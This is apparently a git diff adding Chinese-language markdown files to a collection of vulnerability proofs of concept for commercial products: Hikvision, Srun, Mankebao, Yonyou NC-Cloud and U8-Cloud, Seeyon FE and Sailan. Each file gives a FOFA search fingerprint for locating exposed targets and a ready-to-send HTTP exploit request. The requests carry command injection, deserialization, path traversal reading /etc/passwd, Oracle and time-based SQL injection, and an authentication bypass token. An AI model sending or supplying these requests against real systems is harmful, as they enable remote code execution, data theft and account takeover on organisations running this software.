/portal/cas/login/ajax/licenseExpire.do HTTP/1.1 +Host: +Cache-Control: max-age=0 +Accept: application/json, text/javascript, */*; q=0.01 +X-Requested-With: XMLHttpRequest +If-Modified-Since: Thu, 01 Jun 1970 00:00:00 GMT +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 +Content-Type: application/x-www-form-urlencoded +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Cookie: JSESSIONID=jp9u6tFmSc3fk7Jzf9DQjK25abfBb_b4Yy1r4rax; curtTabId=all; configMenu= +Connection: close +Content-Length: 135 + +{"type":"environment","operate":"","machines":{"id":"$(id > /opt/hikvision/web/components/tomcat85linux64.1/webapps/vms/static/1.txt)"} +``` + +文件路径 + +`/vms/static/1.txt` \ No newline at end of file diff --git a/深澜计费管理系统bind-ip远程代码执行漏洞(XVE-2024-18750).md b/深澜计费管理系统bind-ip远程代码执行漏洞(XVE-2024-18750).md new file mode 100644 index 0000000..7144897 --- /dev/null +++ b/深澜计费管理系统bind-ip远程代码执行漏洞(XVE-2024-18750).md @@ -0,0 +1,20 @@ +# 深澜计费管理系统bind-ip远程代码执行漏洞(XVE-2024-18750) + + + +## fofa + +```yaml +"/js/lib/slimscroll.js" +``` + +## poc + +```python +POST /strategy/ip/bind-ip HTTP/2 +Host: +Content-Type: application/x-www-form-urlencoded + +data1=O%3A33%3A%22setasign%5CFpdi%5CPdfReader%5CPdfReader%22%3A1%3A%7Bs%3A9%3A%22%00%2A%00parser%22%3BO%3A20%3A%22yii%5Credis%5CConnection%22%3A12%3A%7B +``` + diff --git a/满客宝智慧食堂系统downloadWebFile存在任意文件读取漏洞(XVE-2024-18926).md b/满客宝智慧食堂系统downloadWebFile存在任意文件读取漏洞(XVE-2024-18926).md new file mode 100644 index 0000000..56ca456 --- /dev/null +++ b/满客宝智慧食堂系统downloadWebFile存在任意文件读取漏洞(XVE-2024-18926).md @@ -0,0 +1,11 @@ +# 满客宝智慧食堂系统downloadWebFile存在任意文件读取漏洞(XVE-2024-18926) + + + +## poc + +```java +GET /base/api/v1/kitchenVideo/downloadWebFile.swagger?fileName=a&ossKey=/../../../../../../../../../../../etc/passwd HTTP/1.1 +Host: +``` + diff --git a/用友NC-Cloud系统queryPsnInfo存在SQL注入漏洞.md b/用友NC-Cloud系统queryPsnInfo存在SQL注入漏洞.md new file mode 100644 index 0000000..8274eed --- /dev/null +++ b/用友NC-Cloud系统queryPsnInfo存在SQL注入漏洞.md @@ -0,0 +1,21 @@ +# 用友NC-Cloud系统queryPsnInfo存在SQL注入漏洞 + +用友NC Cloud queryPsnInfo接口存在SQL注入漏洞,攻击者可通过该漏洞获取数据库敏感信息。 + +## fofa + +```yaml +app="用友-NC-Cloud" +``` + +## poc + +```java +GET /ncchr/pm/obj/queryPsnInfo?staffid=1%27+AND+1754%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28122%29%7C%7CCHR%28118%29%7C%7CCHR%28113%29%7C%7C%28SELECT+%28CASE+WHEN+%281754%3D1754%29+THEN+1+ELSE+0+END%29+FROM+DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28112%29%7C%7CCHR%28107%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%29--+Nzkh HTTP/1.1 +User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/41.0.887.0 Safari/532.1 +Accesstokenncc: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyaWQiOiIxIn0.F5qVK-ZZEgu3WjlzIANk2JXwF49K5cBruYMnIOxItOQ +Host: +Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 +Connection: close +``` + diff --git a/用友NC-Cloud系统queryStaffByName存在SQL注入漏洞.md b/用友NC-Cloud系统queryStaffByName存在SQL注入漏洞.md new file mode 100644 index 0000000..8101bee --- /dev/null +++ b/用友NC-Cloud系统queryStaffByName存在SQL注入漏洞.md @@ -0,0 +1,22 @@ +# 用友NC-Cloud系统queryStaffByName存在SQL注入漏洞 + + NC Cloud是用友推出的大型企业数字化平台。用友NC-Cloud系统queryStaffByName存在SQL注入漏洞。 + +## fofa + +```yaml +app="用友-NC-Cloud" +``` + +## poc + +```js +GET /ncchr/pm/staff/queryStaffByName?name=1%27+AND+7216%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%28113%29%7C%7CCHR%28107%29%7C%7CCHR%28112%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7C%28SELECT+%28CASE+WHEN+%287216%3D7216%29+THEN+1+ELSE+0+END%29+FROM+DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28118%29%7C%7CCHR%2898%29%7C%7CCHR%28113%29%29--+hzDZ HTTP/1.1 +User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/41.0.887.0 Safari/532.1 +Accesstokenncc: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyaWQiOiIxIn0.F5qVK-ZZEgu3WjlzIANk2JXwF49K5cBruYMnIOxItOQ +Host: +Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 +Connection: close +``` + +![image-20240801101631113](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202408011016195.png) \ No newline at end of file diff --git a/用友u8-cloud系统ESBInvokerServlet存在反序列化漏洞.md b/用友u8-cloud系统ESBInvokerServlet存在反序列化漏洞.md new file mode 100644 index 0000000..f748fd2 --- /dev/null +++ b/用友u8-cloud系统ESBInvokerServlet存在反序列化漏洞.md @@ -0,0 +1,24 @@ +# 用友u8-cloud系统ESBInvokerServlet存在反序列化漏洞 + + + +## fofa + +```yaml +app="用友-U8-Cloud" +``` + +## poc + +``` +POST /servlet/ESBInvokerServlet HTTP/1.1 +Host: ip +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng, */*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Content-Length: 1123 + +反序列内容 +``` + +使用使用cc6链生成payload打即可 \ No newline at end of file diff --git a/致远互联FE协作办公平台apprvaddNew存在sql注入漏洞.md b/致远互联FE协作办公平台apprvaddNew存在sql注入漏洞.md new file mode 100644 index 0000000..504b79c --- /dev/null +++ b/致远互联FE协作办公平台apprvaddNew存在sql注入漏洞.md @@ -0,0 +1,20 @@ +# 致远互联FE协作办公平台apprvaddNew存在sql注入漏洞 + +## fofa + +```java +title="FE协作办公平台" || body="li_plugins_download" +``` + +## poc + +```java +POST /witapprovemanage/apprvaddNew.j%73p HTTP/1.1 +Host: +User-Agent:Mozilla/5.0 (WindowsNT10.0;Win64; x64) AppleWebKit/537.36 (KHTML, likeGecko)Chrome/96.0.4664.93Safari/537.36 +Content-Type:application/x-www-form-urlencoded + +flowid=1';WAITFOR+DELAY+'0:0:5'--+--- +``` + +![image-20240801195718315](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202408011957376.png) \ No newline at end of file diff --git a/赛蓝企业管理系统AuthToken接口存在任意账号登录漏洞.md b/赛蓝企业管理系统AuthToken接口存在任意账号登录漏洞.md new file mode 100644 index 0000000..a53e1c3 --- /dev/null +++ b/赛蓝企业管理系统AuthToken接口存在任意账号登录漏洞.md @@ -0,0 +1,20 @@ +# 赛蓝企业管理系统AuthToken接口存在任意账号登录漏洞 + +赛蓝企业管理系统AuthToken接口存在任意账号登录漏洞,该漏洞可直接登录后台。 + +## fofa + +```java +body="www.cailsoft.com" || body="赛蓝企业管理系统" +``` + +## poc + +``` +GET /AuthToken/Index?loginName=System&token=c94ad0c0aee8b1f23b138484f014131f HTTP/1.1 +Host: +``` + +![image-20240801195959160](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202408011959230.png) + +![image-20240801200007710](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202408012000770.png) \ No newline at end of file